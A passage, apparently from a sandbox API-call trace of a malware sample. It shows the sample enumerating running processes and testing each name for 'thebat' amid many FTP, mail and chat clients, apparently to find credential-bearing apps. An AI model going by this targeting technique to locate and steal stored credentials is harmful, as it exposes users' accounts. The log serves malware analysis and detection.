CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356ba28, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0099.612] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0099.612] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="thebat") returned 0x0 [0099.612] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0099.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.635] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356c108 [0099.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356c108, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0099.635] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0099.635] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="thebat") returned 0x0 [0099.635] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0099.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.636] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357c090 [0099.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x357c090, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0099.636] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0099.636] StrStrIA (lpFirst="powell_jane.exe", lpSrch="thebat") returned 0x0 [0099.636] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0099.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.637] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357da08 [0099.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357da08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0099.637] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0099.637] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="thebat") returned 0x0 [0099.638] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0099.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.639] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357c2a0 [0099.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x357c2a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0099.639] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0099.639] StrStrIA (lpFirst="gainedshape.exe", lpSrch="thebat") returned 0x0 [0099.639] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0099.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.640] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d8a8 [0099.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357d8a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0099.640] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0099.640] StrStrIA (lpFirst="opens-versions.exe", lpSrch="thebat") returned 0x0 [0099.640] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0099.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.641] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356c1d0 [0099.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356c1d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0099.642] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0099.642] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="thebat") returned 0x0 [0099.642] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.643] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c048 [0099.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c048, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.643] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0099.643] StrStrIA (lpFirst="3dftp.exe", lpSrch="thebat") returned 0x0 [0099.643] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.646] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357dc88 [0099.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357dc88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0099.646] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0099.646] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="thebat") returned 0x0 [0099.646] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.648] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c060 [0099.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c060, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.648] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0099.648] StrStrIA (lpFirst="alftp.exe", lpSrch="thebat") returned 0x0 [0099.648] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.649] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c0f0 [0099.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x357c0f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0099.649] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0099.649] StrStrIA (lpFirst="barca.exe", lpSrch="thebat") returned 0x0 [0099.649] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.650] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c228 [0099.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x357c228, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0099.650] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0099.650] StrStrIA (lpFirst="bitkinex.exe", lpSrch="thebat") returned 0x0 [0099.650] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.652] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c0a8 [0099.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c0a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0099.652] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0099.652] StrStrIA (lpFirst="coreftp.exe", lpSrch="thebat") returned 0x0 [0099.652] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0099.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.653] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574f90 [0099.653] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574f90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0099.653] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0099.653] StrStrIA (lpFirst="far.exe", lpSrch="thebat") returned 0x0 [0099.653] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.654] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357c258 [0099.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x357c258, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0099.654] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0099.654] StrStrIA (lpFirst="filezilla.exe", lpSrch="thebat") returned 0x0 [0099.654] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.655] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bfb8 [0099.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x357bfb8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.655] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0099.655] StrStrIA (lpFirst="flashfxp.exe", lpSrch="thebat") returned 0x0 [0099.655] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.656] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c270 [0099.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x357c270, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0099.656] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0099.656] StrStrIA (lpFirst="fling.exe", lpSrch="thebat") returned 0x0 [0099.656] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.657] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d9a8 [0099.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357d9a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0099.657] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0099.658] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="thebat") returned 0x0 [0099.658] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.659] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357dbc8 [0099.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357dbc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0099.668] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0099.668] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="thebat") returned 0x0 [0099.668] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.669] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574f80 [0099.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574f80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0099.669] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0099.669] StrStrIA (lpFirst="icq.exe", lpSrch="thebat") returned 0x0 [0099.669] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.670] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c108 [0099.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x357c108, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.671] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0099.671] StrStrIA (lpFirst="leechftp.exe", lpSrch="thebat") returned 0x0 [0099.671] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0099.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.672] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357bfd0 [0099.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x357bfd0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.672] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0099.672] StrStrIA (lpFirst="ncftp.exe", lpSrch="thebat") returned 0x0 [0099.672] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0099.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.673] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c168 [0099.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x357c168, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0099.673] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0099.673] StrStrIA (lpFirst="notepad.exe", lpSrch="thebat") returned 0x0 [0099.673] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 